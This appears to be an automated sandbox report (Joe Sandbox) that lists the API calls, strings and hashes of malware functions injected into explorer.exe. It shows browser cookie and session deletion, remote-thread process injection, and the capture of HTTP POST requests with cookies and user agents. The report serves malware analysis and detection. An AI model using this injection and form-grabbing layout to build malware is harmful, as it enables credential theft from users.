API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
API String ID: 2509890648-2554907557
Opcode ID: f561c1f224bd84857d6a40da27d8e7a5425bcf70648db2dfc30e2e4417998bd3
Instruction ID: 5b3875d7ddc4cdca2f3a611be84b8f252b39203a8bfcd808973beb3cceb95a87
Opcode Fuzzy Hash: f561c1f224bd84857d6a40da27d8e7a5425bcf70648db2dfc30e2e4417998bd3
Instruction Fuzzy Hash: 7A410731A107709BD638EB749C44B3E33AEEF84B00F050A68F85693181DF28D90D9AE5

Function 02C235D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
Part of subcall function 02C21363: Process32First.KERNEL32(00000000,?), ref: 02C21393
Part of subcall function 02C21363: CloseHandle.KERNELBASE(00000000), ref: 02C213CB

Part of subcall function 02C21363: lstrcmpiA.KERNEL32(?), ref: 02C213A3
Part of subcall function 02C21363: Process32Next.KERNEL32(00000000,00000128), ref: 02C213C0

Sleep.KERNELBASE(000003E8,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C235FA

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23613
lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23623
wsprintfW.USER32 ref: 02C23644

Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C2150D
Part of subcall function 02C214D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C21557
Part of subcall function 02C214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
Part of subcall function 02C214D8: DeleteFileW.KERNELBASE(00000000), ref: 02C21571
Part of subcall function 02C214D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
Part of subcall function 02C214D8: FindClose.KERNELBASE(00000000), ref: 02C2158F

Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23672
lstrcatW.KERNEL32(00000000,02C24614,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23682

Strings

iexplore.exe, xrefs: 02C235D7
\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\, xrefs: 02C2361D
microsoftedgecp.exe, xrefs: 02C235EB
%s%s, xrefs: 02C2363E
microsoftedge.exe, xrefs: 02C235E1
*.*, xrefs: 02C2364D, 02C2368B

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
API String ID: 2436889709-3669280581
Opcode ID: e3a6fed68ecb0c0a881c428150f0536bc2a62898608e258e25780e1f312ba889
Instruction ID: a6f7812ecc5756535c1406cfc536b37c92ee2a22a0e41ae2900eaa1b5bab6be1
Opcode Fuzzy Hash: e3a6fed68ecb0c0a881c428150f0536bc2a62898608e258e25780e1f312ba889
Instruction Fuzzy Hash: 3711827079027067F63C23655C99F3F255FDBD5B52F0A0128F60EBA2C1CED4084C6AA9

Function 02C236A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
Part of subcall function 02C21363: Process32First.KERNEL32(00000000,?), ref: 02C21393
Part of subcall function 02C21363: CloseHandle.KERNELBASE(00000000), ref: 02C213CB

Sleep.KERNELBASE(000003E8,?,00000000,?,02C23834,?,02C23C53,00000001), ref: 02C236B3

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,02C23834,?,02C23C53,00000001), ref: 02C236CC
lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,02C23834,?,02C23C53,00000001), ref: 02C236DC

Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C2150D
Part of subcall function 02C214D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C21557
Part of subcall function 02C214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
Part of subcall function 02C214D8: DeleteFileW.KERNELBASE(00000000), ref: 02C21571
Part of subcall function 02C214D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
Part of subcall function 02C214D8: FindClose.KERNELBASE(00000000), ref: 02C2158F

Strings

firefox.exe, xrefs: 02C236A4
cookies.sqlite, xrefs: 02C236E4
sessionstore.*, xrefs: 02C236F2
\Mozilla\Firefox\Profiles\, xrefs: 02C236D6

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
API String ID: 2731919298-637609321
Opcode ID: 32c8dcdfcbc6c947bc1075d346f8ea5942d83da53975d0cb2bfc8a7e05f84fd7
Instruction ID: f3bce1ad66abc6dedfb0604d5958a847edd27c8b1321730aa5c34f0a079d3e5d
Opcode Fuzzy Hash: 32c8dcdfcbc6c947bc1075d346f8ea5942d83da53975d0cb2bfc8a7e05f84fd7
Instruction Fuzzy Hash: A4F0A05135017033AA3C336A5C08E6F195FCBD6F62705022CF10EA2281CE94090E6AB9

Function 02C21363 Relevance: 7.5, APIs: 5, Instructions: 39
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
Process32First.KERNEL32(00000000,?), ref: 02C21393
lstrcmpiA.KERNEL32(?), ref: 02C213A3
Process32Next.KERNEL32(00000000,00000128), ref: 02C213C0
CloseHandle.KERNELBASE(00000000), ref: 02C213CB

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 868014591-0
Opcode ID: 65464aa3793442ccda78959f5d7075f8d4aa621c83b83fcf1a057b4210ddf0a9
Instruction ID: 3060be2af89f16f31900ff18b6b53dbda5f2c0f1df6f07c4b2400baf6c4e41d1
Opcode Fuzzy Hash: 65464aa3793442ccda78959f5d7075f8d4aa621c83b83fcf1a057b4210ddf0a9
Instruction Fuzzy Hash: 7EF0C8359511249BDB349A259D08FDE77BDEB49721F0106A0E84DD2181EFB44AAC8AD4

Function 02C21235 Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02C2123F
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02C23C33), ref: 02C21251

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 778f6c3eb4c0bb021771b14326d6c25261bf8391d875649561625962465402e1
Instruction ID: 2c2f4dd863dd0050245564127bee5de002c94860f981a698bee56b3c59d7a566
Opcode Fuzzy Hash: 778f6c3eb4c0bb021771b14326d6c25261bf8391d875649561625962465402e1
Instruction Fuzzy Hash: BED01732B552317BE3381EBB6C0CF836E9DDFC6AE1B064125B50DD2140DA608864C6F0

Function 02C215A9 Relevance: 3.0, APIs: 2, Instructions: 9
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,02C2168B), ref: 02C215AF
DeleteFileW.KERNELBASE(00000000), ref: 02C215B6

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 04e1b99304085c255f5a278f7102c0732e9c6348e39220f1fd23d9334de7119f
Instruction ID: 22b0249f49c7d0ff961260da2c11aa080de5b1736084930c86e32ce6e3d4bb14
Opcode Fuzzy Hash: 04e1b99304085c255f5a278f7102c0732e9c6348e39220f1fd23d9334de7119f
Instruction Fuzzy Hash: 1FB092328A2530ABD6392B14B80DFCE2658EF0E211B060642F201910408FA41A968AEA

Function 02C21000 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: c2f0cf2d32cb29c29cdf9963dd68a8d0ec5b86a2147071ac9cfd2cc948595a4a
Instruction ID: 1af979b7e4cec21af8e59969ba89d7054135a906a0d2d1ef598e3099a690776f
Opcode Fuzzy Hash: c2f0cf2d32cb29c29cdf9963dd68a8d0ec5b86a2147071ac9cfd2cc948595a4a
Instruction Fuzzy Hash: 5CA002B5DA01109BDE7857A4B90DF153518F744745F158A44754685040DD64547C8F61

Non-executed Functions

Function 02C21FE5 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C21281

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,774CE800), ref: 02C2201A
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02C22055
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02C220E5
RtlMoveMemory.NTDLL(00000000,02C250A0,00000016), ref: 02C2210C
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02C22134
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02C22144
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 02C2215E
GetLastError.KERNEL32 ref: 02C22166
CloseHandle.KERNEL32(00000000), ref: 02C22174
Sleep.KERNEL32(000003E8), ref: 02C2217B
GetModuleHandleA.KERNEL32(ntdll,atan), ref: 02C22191
GetProcAddress.KERNEL32(00000000), ref: 02C22198
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02C221AE
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02C221D8
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C221EB
CloseHandle.KERNEL32(00000000), ref: 02C221F2
Sleep.KERNEL32(000001F4), ref: 02C221F9
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02C2220D
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C22224
CloseHandle.KERNEL32(00000000), ref: 02C22231
CloseHandle.KERNEL32(?), ref: 02C22237
CloseHandle.KERNEL32(?), ref: 02C2223D
CloseHandle.KERNEL32(00000000), ref: 02C22240

Strings

atan, xrefs: 02C22187
ntdll, xrefs: 02C2218C
0-gw, xrefs: 02C220DC
opera_shared_counter, xrefs: 02C22157

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-gw$atan$ntdll$opera_shared_counter
API String ID: 1066286714-3282715980
Opcode ID: 79c43d30b5fe72e6d47359b2dede17c20263adaa620b68846b6cf4a8e8cd1e9a
Instruction ID: 2e6b4dc5bdcacdc11af0cceba4cbe17dbb8091093ee31e4bff182ef0905335ad
Opcode Fuzzy Hash: 79c43d30b5fe72e6d47359b2dede17c20263adaa620b68846b6cf4a8e8cd1e9a
Instruction Fuzzy Hash: 6861BF71A44324AFD324DF65CC84E6B7BEDEB88754F010A19F949D3241DFB4D9088BA2

Function 02C2118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02C211A9
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02C211C1
lstrlen.KERNEL32(?,00000000), ref: 02C211C9
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02C211D4
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02C211EE
wsprintfA.USER32 ref: 02C21205
CryptDestroyHash.ADVAPI32(?), ref: 02C2121E
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C21228

Strings

%02X, xrefs: 02C211FF

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 82646b71285f9aef54f01fa08986c336728841b7eff44790d238458cd82e732b
Instruction ID: 81ae8600eb93b03d372943ee3767df9525efca4812a4faaa1068f939c87a2eaf
Opcode Fuzzy Hash: 82646b71285f9aef54f01fa08986c336728841b7eff44790d238458cd82e732b
Instruction Fuzzy Hash: EC111972D40118BFEB359BA9EC88FAEBBBCEB48301F114565F505E2140DE714E599BA0

Function 02C216C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02C216D9
GetCurrentThreadId.KERNEL32 ref: 02C216E1
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02C216F1
Thread32First.KERNEL32(00000000,0000001C), ref: 02C216FF
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02C2171E
SuspendThread.KERNEL32(00000000), ref: 02C2172E
CloseHandle.KERNEL32(00000000), ref: 02C2173D
Thread32Next.KERNEL32(00000000,0000001C), ref: 02C2174D
CloseHandle.KERNEL32(00000000), ref: 02C21758

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 0e04f536e599c99297032ed9578a424cb1b7a93279b524fe195cf805a2f96e96
Instruction ID: 7675ba7d644a6f55c4163fb657547620d9881e1df296c829ae82b08584e37bbc
Opcode Fuzzy Hash: 0e04f536e599c99297032ed9578a424cb1b7a93279b524fe195cf805a2f96e96
Instruction Fuzzy Hash: 0811A032858210EFD3359F609848B6A7BB8EFC5B01F060919F64982140CF70859DCBE7

Function 02C22E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02C22EC5), ref: 02C22E27

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02C22E52
NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02C22E7F
StrStrIW.SHLWAPI(?,NetworkService), ref: 02C22E92

Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027

Strings

NetworkService, xrefs: 02C22E8A

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Process$Heap$InformationQuery$AllocateFreeOpen
String ID: NetworkService
API String ID: 1656241333-2019834739
Opcode ID: 12a1ef9b69aa48aee2ebeac028b061551548f44d8d061a46b49997d6305f21b9
Instruction ID: bb98fab48e596464100b1b0820acf8533af04aa8649168bd1ffa4d0c4a361a12
Opcode Fuzzy Hash: 12a1ef9b69aa48aee2ebeac028b061551548f44d8d061a46b49997d6305f21b9
Instruction Fuzzy Hash: B101D871340355BFE3386A259C44F5B3B9DEBC83A2F014529F90BE2142DEB49C489B60

Function 02C22974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

Part of subcall function 02C2104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,02C22A16,?,00000001), ref: 02C21056

Part of subcall function 02C2285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 02C228A2

lstrcat.KERNEL32(00000000,dyn_header_host), ref: 02C22A4A
lstrcat.KERNEL32(00000001,dyn_header_path), ref: 02C22A6C
lstrcat.KERNEL32(?,dyn_header_ua), ref: 02C22A8D
RtlZeroMemory.NTDLL(?,0000000A), ref: 02C22A96
StrToIntA.SHLWAPI(00000000), ref: 02C22AB9
wnsprintfA.SHLWAPI ref: 02C22B0D
lstrcat.KERNEL32(00000000,?), ref: 02C22B2D
lstrcat.KERNEL32(00000000,{:!:}), ref: 02C22B35
lstrcat.KERNEL32(00000000,?), ref: 02C22B3C

Strings

:method POST, xrefs: 02C229D1
%s (HTTP2){:!:}%s%s{:!:}%s{:!:}, xrefs: 02C22B06
:authority , xrefs: 02C22A17
:path , xrefs: 02C22A50
user-agent , xrefs: 02C22A72
content-length , xrefs: 02C22AA0
dyn_header_path, xrefs: 02C22A66
host , xrefs: 02C22A33
dyn_header_host, xrefs: 02C22A44
dyn_header_ua, xrefs: 02C22A87
{:!:}, xrefs: 02C22B2F

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
API String ID: 2605944266-950501416
Opcode ID: 2451228f1031d315c1016cd7e5e96d343973f29738ed35391591cd845dcd8b1d
Instruction ID: 57a09a13711dcdf264bb35ad454dc3cdb8e7e64df0bc6152a960912023177dd8
Opcode Fuzzy Hash: 2451228f1031d315c1016cd7e5e96d343973f29738ed35391591cd845dcd8b1d
Instruction Fuzzy Hash: 045173706043619FD729EF258980B6FB7DAAFC8704F04081CE84A67242DF74DD4D9B66

Function 02C22FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155

RtlZeroMemory.NTDLL(?,0000000A), ref: 02C22FFA
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23024
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23052
wsprintfA.USER32 ref: 02C230B9
lstrcat.KERNEL32(00000000,00000000), ref: 02C230E5
lstrcat.KERNEL32(?,{:!:}), ref: 02C230F8
lstrlen.KERNEL32(?,?,?,?,?,?,?,02C26038), ref: 02C23109
RtlMoveMemory.NTDLL(00000000), ref: 02C23112

Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027

Strings

%s{:!:}%s{:!:}%s{:!:}, xrefs: 02C230B3
Cookie:, xrefs: 02C230CE
User-Agent:, xrefs: 02C23094
application/x-www-form-urlencoded, xrefs: 02C22FAD
application/json, xrefs: 02C22FC5
Host:, xrefs: 02C2303B
Content-Length:, xrefs: 02C23004
, xrefs: 02C23068
{:!:}, xrefs: 02C230F2

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
API String ID: 2886538537-1627781280
Opcode ID: 19c00ac1aa1534b675addc2d1f98d92952f698df2d541e7ff44c9a991f101e7f
Instruction ID: 2790e9bb7c85c058589096d36b69e7e61164c99406a832a8920a71d66c8b4105
Opcode Fuzzy Hash: 19c00ac1aa1534b675addc2d1f98d92952f698df2d541e7ff44c9a991f101e7f
Instruction Fuzzy Hash: F631D1717003B46BD728AA249C54F6F36ABDBC0741F04482CF8469B282DEB9D80D9FE1

Function 02C23132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 02C2322D
wsprintfA.USER32 ref: 02C2329E
lstrcat.KERNEL32(00000000,00000000), ref: 02C232AF
lstrcat.KERNEL32(00000000,{:!:}), ref: 02C232BE
lstrlen.KERNEL32(00000000), ref: 02C232C1
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02C232D2

Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027

Strings

%s{:!:}%s{:!:}%s{:!:}, xrefs: 02C23298
POST, xrefs: 02C2327F
{:!:}, xrefs: 02C232B8

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
API String ID: 3430864794-1604029033
Opcode ID: 669d5d998cf030783bb4623c40fa18f4341127d657117b8079be8bb50cf5b258
Instruction ID: a5c544e24d8b383a9c5c2ebe5fe3c9088917d2630f01e2436abbe77d3c2af470
Opcode Fuzzy Hash: 669d5d998cf030783bb4623c40fa18f4341127d657117b8079be8bb50cf5b258
Instruction Fuzzy Hash: FA416A71504395AFD321DF10DC88F6BBBADFB88345F040A2EF58692241DFB5990C9BA6

Function 02C23449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02C26038), ref: 02C23455
lstrcat.KERNEL32 ref: 02C234AB

Part of subcall function 02C22FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 02C22FFA
Part of subcall function 02C22FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23024
Part of subcall function 02C22FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23052
Part of subcall function 02C22FAA: wsprintfA.USER32 ref: 02C230B9
Part of subcall function 02C22FAA: lstrcat.KERNEL32(00000000,00000000), ref: 02C230E5

Part of subcall function 02C22F1F: CreateThread.KERNEL32(00000000,00000000,02C22ED2,?,00000000,00000000), ref: 02C22F2F
Part of subcall function 02C22F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 02C22F36

Part of subcall function 02C2105D: VirtualFree.KERNEL32(?,00000000,00008000,02C22B4B), ref: 02C21065

RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 02C23504
StrToIntA.SHLWAPI(?,00000000,?), ref: 02C2352B
RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 02C2358D
RtlLeaveCriticalSection.NTDLL(02C26038), ref: 02C235C1

Part of subcall function 02C21274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C21281

Strings

POST, xrefs: 02C234F1
Content-Length:, xrefs: 02C2350E
, xrefs: 02C2353D

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
String ID: $Content-Length:$POST
API String ID: 2960674810-114478848
Opcode ID: f5d46b17048e903a705c21edc524fae78a344e701164596b1d5e77289a5e7752
Instruction ID: fe9a34ef344471ca7ce3e746a50c8d420f6b1f6bf723b8b0df43a82769c71ff6
Opcode Fuzzy Hash: f5d46b17048e903a705c21edc524fae78a344e701164596b1d5e77289a5e7752
Instruction Fuzzy Hash: 5F310630E503A08BCB25EF24948476A7BAFBB84305F150A6CE80693245CF79851DEFE9

Function 02C2186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

Part of subcall function 02C2106C: lstrlen.KERNEL32(?,?,00000000,00000000,02C2189F,774C8A60,?,00000000), ref: 02C21074
Part of subcall function 02C2106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 02C21086

Part of subcall function 02C217DC: RtlZeroMemory.NTDLL(?,00000018), ref: 02C217EE

RtlZeroMemory.NTDLL(?,0000003C), ref: 02C218FB
wsprintfW.USER32 ref: 02C219F2
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02C21AD0

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 02C21A34
Accept: */*Referer: %S, xrefs: 02C219E8
POST, xrefs: 02C219A0

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

